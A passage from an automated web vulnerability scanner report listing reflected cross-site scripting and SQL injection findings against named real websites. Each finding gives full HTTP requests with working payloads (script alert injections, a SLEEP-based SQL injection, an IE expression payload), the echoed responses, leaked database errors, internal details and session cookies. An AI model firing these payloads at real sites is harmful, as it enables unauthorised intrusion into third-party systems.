User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:52:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1">
...[SNIP]...
5.49. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d405"><script>alert(1)</script>80fbcfd4b8c was submitted in the scs_sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:13:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
hvars" value="scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488">
...[SNIP]...
5.50. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_tid request parameter is copied into the HTML document as plain text between tags. The payload 69442<script>alert(1)</script>7db2dee7925 was submitted in the scs_tid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E69442<script>alert(1)</script>7db2dee7925&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 603

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</script>69442<script>alert(1)</script>7db2dee7925<br>
...[SNIP]...
5.51. https://verify.authorize.net/anetseal/ [rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /anetseal/

Issue detail

The value of the rurl request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f was submitted in the rurl parameter. This input was echoed as e4830 style=x:expr/**/ession(alert(1)) dfd967efe8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /anetseal/?pid=3de2b6f5-d068-4960-b93c-80b3d36d8ffe&rurl=https%3A//www.clone-systems.com/ecommerce/login.php%3Faction%3Dsend_password_emaile4830%20style%3dx%3aexpr/**/ession(alert(1))%20dfd967efe8f HTTP/1.1
Host: verify.authorize.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:17:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5955


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>Authorize.Net Verified Merchant Seal</title>
<meta name="GENERATOR" Content="Microsoft Visual St
...[SNIP]...
<a href= https://www.clone-systems.com/ecommerce/login.php?action=send_password_emaile4830 style=x:expr/**/ession(alert(1)) dfd967efe8f >
...[SNIP]...
5.52. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 44a0a<script>alert(1)</script>21007e051bb was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 06 May 2011 20:09:07 GMT
Via: NS-CACHE: 100
Etag: "4ee52e4d9af28f6ad0ba9e9bb34c78553fba3e28"
Content-Length: 205
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 06 May 2011 20:19:06 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/firstmateonlinecom/blind-sql-injection-xss-dork-cross-site-scripting-poc-report.html44a0a<script>alert(1)</script>21007e051bb", "diggs": 0});
5.53. http://www.advisorsquare.com/useradmin/Authenticate.asp [ComeBack parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the ComeBack request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6348c"><script>alert(1)</script>e788ceeb686 was submitted in the ComeBack parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732&ComeBack=/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686 HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2188
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=DCCHGKOBPLPMPBMHHEMNDHHG; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:54 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" Name="ComeBack" value="/useradmin/YourCPPortfolio.asp6348c"><script>alert(1)</script>e788ceeb686">
...[SNIP]...
5.54. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into an HTML comment. The payload f8cb1--><script>alert(1)</script>c3e8d872928 was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /useradmin/Authenticate.asp?GroupId=85732f8cb1--><script>alert(1)</script>c3e8d872928&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2233
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=HACHGKOBLIOECFPOADGMADDH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="AdvisorID" value="85732f8cb1--><script>alert(1)</script>c3e8d872928">
...[SNIP]...
5.55. http://www.advisorsquare.com/useradmin/Authenticate.asp [GroupId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advisorsquare.com
Path:   /useradmin/Authenticate.asp

Issue detail

The value of the GroupId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9045"><script>alert(1)</script>8c93197ec3e was submitted in the GroupId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /useradmin/Authenticate.asp?GroupId=85732e9045"><script>alert(1)</script>8c93197ec3e&ComeBack=/useradmin/YourCPPortfolio.asp HTTP/1.1
Host: www.advisorsquare.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2231
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EACHGKOBOILHIFCFOLHPDECB; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:36:51 GMT

<html><head><meta NAME="GENERATOR" Content="Microsoft Visual Studio 6.0"></head><body link=#000000 alink=#000000 vlink=#000000 bgcolor=#ffffff >
           
           <form action="authenticate.asp" method="post">
...[SNIP]...
<input type="hidden" name="GroupID" value="85732e9045"><script>alert(1)</script>8c93197ec3e">
...[SNIP]...
5.56. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The value of the Year request parameter is copied into the HTML document as plain text between tags. The payload 431bc<script>alert(1)</script>069fa5b0117 was submitted in the Year parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/alertsArchv.asp?Year=2006431bc<script>alert(1)</script>069fa5b0117 HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:10 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13992
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=KPGCALMBKHIIAMHHIBKADIIJ; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(Year = 2006431bc<script>alert(1)</script>069fa5b0117)'.<br>
...[SNIP]...
5.57. http://www.brownrudnick.com/nr/articlesindv.asp [ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brownrudnick.com
Path:   /nr/articlesindv.asp

Issue detail

The value of the ID request parameter is copied into the HTML document as plain text between tags. The payload 5d6aa<script>alert(1)</script>78389e1a6ea was submitted in the ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nr/articlesindv.asp?ID=554f0bd0<script>alert(document.cookie)</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea HTTP/1.1
Pragma: no-cache
Host: www.brownrudnick.com
Connection: Keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:48:17 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=EEHCALMBMMHJOCDFIKKJMEBE; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Articles</title>
<link r
...[SNIP]...
</script>ba5591b9a235d6aa<script>alert(1)</script>78389e1a6ea)'.<br>
...[SNIP]...
5.58. http://www.caribbean-ocean.com/accommodation2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 3ff42<a>78f0dfbcbea was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /accommodation2.php?id=82893ff42<a>78f0dfbcbea HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 9767

1054: Unknown column '82893ff42' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = 82893ff42<a>78f0dfbcbea</textarea>
...[SNIP]...
5.59. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 42305%3balert(1)//992dbf45a01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 42305;alert(1)//992dbf45a01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /accommodation2.php?id=/42305%3balert(1)//992dbf45a018289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:42 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10262

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/42305;alert(1)//992dbf45a018289' at line 1<br /><br /><textarea rows="10" cols="100">SELECT area_id AS country_id
FROM accommodation
WHERE accomm_id = /42305;alert(1)//992dbf45a018289</textarea>
...[SNIP]...
5.60. http://www.caribbean-ocean.com/get-image.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload b4e6a<a>5d16744a2c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=18696b4e6a<a>5d16744a2c HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 15:59:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 847
Content-Type: image/jpg

1054: Unknown column '18696b4e6a' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 18696b4e6a<a>5d16744a2c</textarea>
Warning: mysql_num_r
...[SNIP]...
5.61. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c0726<a>c9b4bd0777c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /get-image.php?id=1/c0726<a>c9b4bd0777c8696 HTTP/1.1
Cookie: PHPSESSID=56e9tj63arfnmfkpi7rsto854a5vfekl
Host: www.caribbean-ocean.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:58:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 844
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpg

1054: Unknown column 'c0726' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image
FROM image
WHERE image_id = 1/c0726<a>c9b4bd0777c8696</textarea>
Warning: mysql_num_rows
...[SNIP]...
5.62. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8cbea<script>alert(1)</script>7cda621b4b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Barbados%20Resort%20holidays/918cbea<script>alert(1)</script>7cda621b4b3 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:56 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6943

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (918cbea<script>alert(1)</script>7cda621b4b3)
ORDER BY area_name ASC</textarea>
...[SNIP]...
5.63. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4529a<script>alert(1)</script>38d4ed9b16f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /luxury%20Jamaica%20Resort%20holidays/1054529a<script>alert(1)</script>38d4ed9b16f HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6944

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<textarea rows="10" cols="100">SELECT *
FROM area
WHERE area_id IN (1054529a<script>alert(1)</script>38d4ed9b16f)
ORDER BY area_name ASC</textarea>
...[SNIP]...
5.64. http://www.dhmiservices.com/ClickContact/js.ashx [img parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dhmiservices.com
Path:   /ClickContact/js.ashx

Issue detail

The value of the img request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 239be"%3balert(1)//e2bc96337d2 was submitted in the img parameter. This input was echoed as 239be";alert(1)//e2bc96337d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ClickContact/js.ashx?Agent=950b13d4-72fe-46ca-891d-8922b0525b3e&img=http%3A%2F%2Fwww.dhmiservices.com%2FImageHandler.ashx%3Fimg_id%3D3824239be"%3balert(1)//e2bc96337d2 HTTP/1.1
Host: www.dhmiservices.com
Proxy-Connection: keep-alive
Referer: http://www.agentadvantage.com/
